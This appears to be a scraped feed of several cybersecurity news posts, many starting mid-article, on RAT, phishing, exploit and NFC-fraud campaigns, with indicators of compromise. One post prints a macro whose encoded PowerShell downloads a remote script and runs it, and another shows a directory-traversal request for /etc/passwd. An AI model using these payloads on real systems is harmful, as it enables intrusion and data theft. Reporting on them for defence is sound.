Active throughout 2024, the campaign targets job seekers in the beauty and fashion industries by impersonating global brands like Bershka, Fragrance Du Bois, John Hardy, and Dear Klairs. Victims are lured with fake job offers for high-profile marketing roles.

Social Engineering Meets Technical Evasion

The attack starts with a malicious LNK file disguised as a PDF—often named with a double extension like “.pdf.lnk”—to trick users into opening it. Once launched, the infection chain gives attackers full system access, allowing them to drop additional malware and tools undetected.

This blend of social engineering and technical evasion highlights the growing sophistication of modern malware threats and the need for advanced detection beyond traditional defenses.

When opened, the LNK file runs a PowerShell command that decodes a base64 script, kicking off a multi-stage process using PowerShell, JavaScript, AutoIt, and obfuscated payloads.

The chain downloads a fake MP4 file containing hidden JavaScript in HTML tags, which decodes more scripts to deliver and execute a PE file named “phom.exe.”

Technical Evasion Tactics Behind the PureHVNC RAT

To keep the attack believable, a fake PDF job offer is shown to the user while malicious activity runs in the background. An AutoIt-compiled binary quietly executes scripts, sets up persistence by placing an internet shortcut in the Windows Startup folder, and uses process hollowing to inject a .NET payload into trusted processes like jsc.exe or AppLaunch.exe.

This payload—encrypted with AES-256 and protected with .NET Reactor—ultimately loads the PureHVNC RAT. Its configuration files reveal multiple campaign IDs and connections to command-and-control (C2) servers like 85.192.48.3 and 139.99.188.124.

The campaign is heavily obfuscated at every stage. It uses tools like CypherIT to hide AutoIt scripts and embeds junk data to evade detection. Anti-analysis checks are also built in, stopping execution if tools like AvastUI.exe or known antivirus emulator names are detected.

Persistence is reinforced by dropping files into a folder named “WordGenius Technologies” under %LocalAppData%, using random file names to stay under the radar.

The attack shows high technical skill—from string replacements in scripts to using built-in Windows tools like mshta.exe to run remote files—making it hard to detect with standard defenses.

While the initial infection method isn’t confirmed, evidence points to email delivery, especially through job offers and fake copyright warnings.

As PureHVNC evolves, including new delivery methods using Python scripts and AI-generated phishing sites seen in 2024, defending against these threats will require modern detection tools and constant vigilance. This campaign poses a serious risk by giving attackers full remote access for further exploitation.

IOCs

• Distribution addresses

45.151.62.2
semrush-alternative.com
sadgfua54a.xyz

• C2 addresses

139.99.188.124
85.192.48.3

• LNK files (MD5)

f26493ea92987113679edbcaec7234ff
b758944bbda18e8802e9d80a2cf1cf75
9060fd189774be18610dc2ff4be0745e
c656c140ab0f2b6596bf6805e15df13b
7ad407e2d94adc16470f418bf0fc708f
e1ca0780e64a73659405a87e95e0b2e7
bfb2fdddd4326cf708ba847decb0fe87
1469217ca9103001ddf88fac5d8f8bcc
72c8cbb9f13846df470766f19668363c

• Fake MP4 files (MD5)

f39b82129259ef4a3fcd1a50e995957d
5d51e0196f459617b142670958d8b54a
b58b0bd6cbdc14fe0f07a4453ed77e76
d086283e23d91ecc1a7a8f5bc6c658c5

• Compiled AutoIt files (MD5)

7cf7b05416a7cc98a2abb61f6ac97650
351d6757503b98fc56b0d3415f674b75
f3166a49810a3cbf658c794793c5ba8d
a46469cf5fb8c5682bed2322bb6b5029
8c6350413ea2a890f04d4b3e8e3ecb6f
d131cf27b565c942cc5d0064e8ac9a3a
0814745e941281e3eae66425f58cbe7e

• Obfuscated AutoIt script files (MD5)

00e01b6a41b5527785eed1cf01351b1
4e366dbfaa07314e38ee148cb5b19cde
91ceeaf5e81a83041009c9770da29ef4
d395d4455200ec7814dd306f2ce4144c
12b8e858fdaf1469e0d7a0fb0a5f8475
460160210500b3180d0d4da2e73bf651
e7e605f842b04f5981dbcdea92f09e39

The post PureHVNC RAT Evades Defenses with Fake Jobs & PowerShell appeared first on First Hackers News.

Instead of spoofing domains, they registered free consumer accounts and sent phishing emails through Nifty’s own mail servers—such as mta-snd-e0X.mail.nifty[.]com—using IP ranges like 106.153.226.0/24 and 106.153.227.0/24.

Discovered by Raven, a leading threat detection firm, the campaign bypassed traditional email defenses by passing SPF, DKIM, and DMARC checks. This allowed the emails to evade most secure email gateways (SEGs), which rely heavily on broken authentication or known bad domains to detect threats.

The operation unfolded in several waves, starting on April 28 with lures themed around an “Execution Agreement,” followed by waves on May 7 and May 16 using “SAFE Agreement” themes. A spike in activity occurred on May 23, when dozens of emails were sent in under a minute—indicating automation and likely phishing kit usage.

Instead of links, emails carried attachments like PDFs and HTML files (e.g., SAFE_Terms_May2025.pdf, Execution_Agreement.html) that triggered redirect chains via legitimate tracking tools, ultimately leading to phishing sites hosted on obfuscated domains such as 2vf78gnafutdc5zqmhng[.]iqmwpx[.]ru.

These sites were designed to steal credentials and hijack Gmail sessions through token theft.

Adaptive Attack Waves Exploit Trust and Evasion Tactics

The phishing campaign leveraging Nifty[.]com didn’t rely on crude techniques—it evolved with each wave, making detection increasingly difficult. Attackers used advanced evasion methods such as HTML padding with whitespace characters, multipart MIME structures to conceal payloads, and display name spoofing like “Name via DocuSign.”

The emails also featured AI-generated content with near-perfect grammar, allowing them to slip past conventional security filters.

Raven, the threat detection firm that uncovered this campaign, flagged it through behavioral anomalies—unusual sender-recipient patterns, repeated contract-themed lures, consistent attachment naming, and redirect chains leading to suspicious domains.

These indicators helped detect threats that otherwise looked legitimate on the surface.

This medium-to-high sophistication attack highlights a major blind spot in traditional email security systems. With valid SPF, DKIM, and DMARC, and no malicious links in the message body, most secure email gateways failed to flag these emails as threats.

The use of authenticated infrastructure, coupled with adaptive and stealthy delivery techniques, reflects a growing trend: phishing actors are embedding themselves within trusted environments to boost success rates.

Raven’s ability to detect this campaign—even with clean headers and valid authentication—proves the importance of advanced detection methods. Organizations must move beyond outdated filters and adopt tools that analyze behavior, content context, and hidden redirection techniques.

To stay ahead, email defenses must evolve to detect not just what’s obviously malicious, but what subtly blends in.

The post Nifty[.]com Infrastructure Exploited in Phishing Attack appeared first on First Hackers News.

The operation was launched using 251 unique IP addresses, all geolocated to Japan and hosted by Amazon Web Services (AWS).

These IPs were inactive before and after the campaign, indicating the likely use of temporary, rented cloud infrastructure to carry out the scan and then disappear—a tactic often seen in professional, stealthy attacks.

Instead of random, opportunistic probing, this was a targeted operation, carefully mapped out and likely automated, suggesting it was centrally planned using custom tooling or orchestration scripts.

The attackers were not just scanning at random—they were actively probing for known vulnerabilities and misconfigurations across a wide range of commonly deployed enterprise systems. GreyNoise detected 75 distinct behaviors as part of the campaign, including:

Exploitation Attempts for Known CVEs:

• Adobe ColdFusion – CVE-2018-15961 (Remote Code Execution)
• Apache Struts – CVE-2017-5638 (OGNL Injection)
• Elasticsearch – CVE-2015-1427 (Groovy Sandbox RCE)
• Atlassian Confluence – CVE-2022-26134 (OGNL Injection)
• Bash (Shellshock) – CVE-2014-6271

Other Activities:

• Scanning for vulnerable CGI scripts
• Exposing environment variables
• Checking for leaked .git directories or config files
• Attempting shell uploads
• Performing WordPress author enumeration (to prepare for brute-force or privilege escalation)

For example, the tag “ColdFusion RCE Attempt” would be triggered if GreyNoise detects exploit traffic like this in HTTP requests:

POST /cfide/adminapi/base.cfc?method=login HTTP/1.1
Host: vulnerable-server
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

cfcPath=../../../../../../../../etc/passwd

This request tries to access system files using directory traversal, a clear sign of an attack attempt.

Recommended Defensive Actions

• Monitor for GreyNoise tags associated with known CVEs
• Block AWS-sourced scanning activity where appropriate
• Review logs for abnormal HTTP requests or access attempts
• Patch systems affected by the listed CVEs
• Harden public-facing apps against common misconfigurations

Risk Factors

The May 8 campaign shows how fast and advanced cloud-driven attacks have become. Organizations need to:

• Patch known CVEs
• Use real-time threat intelligence
• Monitor edge and legacy systems closely

These types of scans often come just before major zero-day exploits, so acting quickly is key to staying secure.

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!

The post Cloud Devices Under Attack: 251 IPs Exploit 75 Flaws appeared first on First Hackers News.

Why DocuSign Is Being Abused

Attackers are using fake DocuSign emails to trick people into sharing login credentials or financial details. These phishing messages often look like real DocuSign requests, asking users to “review documents” through yellow buttons or QR codes.

Clicking these links or scanning the QR codes takes users to fake sites—often designed to look like Microsoft login pages—where sensitive information is stolen.

QR-based phishing is especially dangerous because mobile devices often lack strong security tools, making it easier for attackers to slip through undetected.

These attacks don’t just steal data—they can lead to full network breaches, allowing attackers to move across systems, gain higher access, or even install ransomware.

Cybercriminals are now using real DocuSign accounts to send phishing emails that look completely legitimate. These fake emails often pretend to come from suppliers, government offices, or even HR departments.

Some scams involve fake invoices to steal money. Others use refund fraud tricks, asking people to share personal details over the phone. Some attackers even use DocuSign’s APIs to create official-looking notifications that blend trust with deception.

These scams can lead to:

• Unauthorized access to company systems
• Financial losses
• Personal data leaks on the dark web

A single compromised account can quickly snowball into a much larger breach.

How to Stay Protected

According to an ESET report, businesses should use a multi-layered security approach:

• Train employees to spot phishing emails. Look out for strange sender addresses, odd grammar, or mismatched email signatures.
• Don’t click links in DocuSign emails. Real DocuSign messages include a security code—log in directly on their site to access documents.
• Use multi-factor authentication (MFA) to protect all business accounts.
• Enforce strong passwords with a password manager.
• Install advanced security tools like ESET to detect malicious links and attachments.
• Report suspicious emails to your IT team and DocuSign’s official spam reporting channel.

In Case of a Breach

If you suspect a compromise:

• Change passwords immediately
• Scan for malware
• Isolate affected devices
• Monitor the dark web for leaked data

DocuSign makes online workflows easier—but always double-check emails before clicking. Trust should never replace caution in today’s threat landscape.

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!

The post Threat Actors Use Fake DocuSign for Corporate Data Theft appeared first on First Hackers News.

The site mimics a genuine flight booking service, using professional design and SSL encryption to appear trustworthy. Visitors see a familiar travel booking page with flight search options and promises like “lowest fare guaranteed” and “easy booking process.”

But behind this facade, the site is capturing sensitive data such as names, phone numbers, emails, and possibly financial details, tricking users into thinking they’re using an official government service.

InfoSec Write-ups analysts found the malicious domain is part of an impersonation campaign active since July 2022. ThreatWatch360 researchers reported the site is hosted on IP 167[.]172[.]151[.]4 and uses a Let’s Encrypt SSL certificate to seem secure.

The domain is registered under the name Ali Sajil from Kerala, India, though this may be fake.

This phishing attack poses a serious risk to India’s digital services by damaging public trust and exposing users to identity theft and financial fraud. It comes at a time when digital travel services are growing in popularity, making the threat even more concerning.

How the Scam Works

The fake website uses advanced techniques to appear legitimate and collect user data. The domain name digiyatra[.]in was chosen to match the real DigiYatra brand and trick users.

It uses an SSL certificate that includes both the main domain and an app subdomain (app.digiyatra.in), hinting at possible plans to fake a mobile app as well.

The site’s design closely copies real travel booking platforms but doesn’t actually process any bookings. Instead, it collects personal information, which may be sold on the dark web or used for future scams targeting Indian citizens.

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!

The post Fake DigiYatra Apps Steal Indian Financial Data appeared first on First Hackers News.

The scam uses familiar work-related messaging to steal login credentials.

Researchers warn that the fake meeting page looks convincing, even showing a video of fake “participants” to make it seem real.

The urgent tone in the email pushes users to click links quickly, increasing the risk of falling for the scam.

Sophisticated Phishing Scam Targets Zoom Users

A new phishing scam is fooling users with fake Zoom emails that closely mimic real meeting invites. These emails copy Zoom’s branding and formatting to avoid suspicion.

When users click the link, they’re taken to a fake meeting page that asks for their Zoom login or other sensitive info. The fake sites use domain names that look almost identical to real ones.

Experts say stolen credentials can lead to wider network breaches, as attackers may use them to access company systems.

The phishing emails use personalized links, hinting that attackers may have prior data on targets—making the scam more believable. This approach shows a higher level of planning than usual phishing attacks.

The scam also plays on urgency and fear of missing important meetings, making users more likely to click without thinking.

To stay safe, users should avoid clicking suspicious links and verify unexpected invites directly with coworkers. Companies should use strong email filters, train staff on phishing awareness, and enable multi-factor authentication (MFA) to protect against stolen passwords.

Indicators of Compromise (IoCs)

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!

The post Zoom Phishing Steals Login Credentials appeared first on First Hackers News.

These emails are crafted to appear as if they come from legitimate government sources, making them more convincing. The attached Word documents contain embedded macros that, once enabled, trigger a multi-stage malware infection.

The malicious documents are disguised as official briefings or intelligence reports about the Pahalgam incident. They prompt recipients to “Enable Content” to view the file, which silently activates hidden malware.

The attackers designed these files with realistic letterheads and formatting to mimic genuine government communications. Seqrite researchers discovered the campaign after noticing unusual network traffic from government systems.

Their analysis revealed a previously unknown Remote Access Trojan (RAT) that stays hidden on infected devices and connects to servers linked to a known nation-state group that has targeted Indian government agencies in the past.

Experts believe this is a highly targeted and sophisticated operation, aimed at collecting sensitive information from defense, intelligence, and law enforcement networks. The campaign’s timing—right after the Pahalgam attack—shows the attackers are using current events to increase their success.

All about the attack

The attack starts when victims open a file named “Pahalgam_Incident_Report_Confidential.docx”. If they enable macros, hidden VBA code runs a PowerShell command to launch the malware.

Sub AutoOpen()
Dim str As String
str = “powershell.exe -nop -w hidden -e JGM9KChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xMDUvYy5wbmcnKTtpZXggJGM=”
Shell str, vbHide
End Sub

The PowerShell command downloads more malware hidden in a fake PNG file. It sets up persistence using scheduled tasks and Registry changes, then gathers system info, steals data, and tries to spread across government networks.

Indicators of Compromise (IOCs)

The post Pahalgam Attack Lure Used in Cyberattacks Against Indian Government appeared first on First Hackers News.

Commvault RCE – CVE-2025-34028

The flaw allows attackers to execute malicious code without authentication. After researchers released a working proof-of-concept exploit, threat actors began actively scanning for vulnerable systems.

Commvault, widely used for enterprise backup and data protection, now faces scrutiny as the flaw undermines trust in backup security. Experts warn that if backup systems are compromised, recovery from ransomware becomes nearly impossible.

CVE-2025-34028 Exploitation: From SSRF to RCE

A critical vulnerability has been found in Commvault’s on-premise software. The issue lies in an API endpoint (/commandcenter/deployWebpackage.do) meant for internal use. However, it can be accessed without authentication, allowing attackers to perform dangerous actions.

By exploiting this flaw, attackers can:

• Trick the server into making internal requests (SSRF).
• Use directory traversal to write files in sensitive locations.
• Upload and run malicious code like webshells, leading to full remote code execution (RCE).

Researchers showed that attackers can drop and execute arbitrary JSP files on the server, completely compromising it.

A working proof-of-concept is now public, and attackers are already scanning for vulnerable systems.

Urgent Steps to Stay Protected

• Update Now: Commvault has released security patches. All users should apply them right away.
• Watch for Suspicious Activity: Check for strange deployment requests, unknown files in web folders, or unusual outgoing traffic.
• Limit Internet Access: Keep backup tools and management panels off the public internet whenever possible.

This CVE-2025-34028 case is a clear warning — even security tools can become threats if not properly maintained.

The post Commvault RCE Exploited, PoC Available appeared first on First Hackers News.

Cybercriminals, mainly from Chinese underground networks, are using NFC (Near Field Communication) technology to carry out large-scale fraud at ATMs and point-of-sale (POS) terminals.

According to Resecurity, many banks, FinTech firms, and credit unions reported a sharp rise in NFC-based fraud in early 2025. One major U.S. financial institution lost millions as a result.

These attackers use advanced tools to manipulate NFC systems and make unauthorized payments. Targets include regions like the U.S., UK, EU, Australia, Canada, Japan, and the UAE.

How the Fraud Works

The attackers take advantage of Android’s Host Card Emulation (HCE), which lets phones act like payment cards. Tools like “Z-NFC” and “Track2NFC”—sold on the Dark Web—are used to steal payment data and simulate legitimate transactions at ATMs and POS terminals.

Some techniques, like “Ghost Tap,” allow payments without alerting payment processors. Others use apps like “HCE Bridge” to fake contactless payment methods.

Resecurity found that these tools are designed to hide from detection, using complex code and encryption. Some criminals even operate mobile device “farms” to commit fraud on a large scale.

Global Impact

Hackers have targeted major banks like Barclays, HSBC, and Santander. They also abuse loyalty programs and use stolen card data from ATM skimmers to make contactless payments that don’t require PINs.

NFC-enabled terminals are often misused or registered with fake identities, allowing fraud and money laundering in countries like China, Malaysia, and Nigeria.

With nearly 2 billion devices supporting NFC worldwide, and the privacy of encrypted communication, these crimes are hard to trace. As more people use contactless payments, stronger security and international cooperation are essential to stop this growing threat.

Indicators of Compromise (IOC)

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!

The post NFC Exploited to Steal Funds from ATMs and POS appeared first on First Hackers News.

Complex malware attacks are using phishing emails disguised as invoices or orders. These emails contain an uncommon file type, application/windows-library+xml, which can bypass some email filters.

When opened, the file connects to a WebDAV resource hosted on Cloudflare, triggering a multi-step infection process.

The user is led to open a shortcut (LNK) file that launches an HTML Application (HTA) instead of a PDF. This HTA file runs a script that installs Python using PowerShell, helping the malware remain hidden and continue its execution.

To avoid detection, attackers hide installation folders and use cleanup scripts. They ensure persistence by placing malicious scripts in the Windows Startup folder, allowing the malware to run after every reboot.

Detection and Monitoring Efforts

Sekoia uses a mix of Sigma rules and custom queries in their SOL language to detect different stages of the attack — from suspicious email attachments to PowerShell commands.

Rules like “Suspicious Email Attachment Received” and “Mshta Suspicious Child Process” help identify malicious activity and command-and-control behavior.

The report highlights how hard it is to detect these advanced threats, especially with attackers using trusted infrastructure and clever evasion tactics.

Sekoia TDR continues to track these threats and improve their detection tools. Their research shows the need for real-time threat intelligence and strong monitoring to stay ahead of cybercriminals.

IOCs

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!

The post Hackers Leverage Cloudflare for RAT Deployment appeared first on First Hackers News.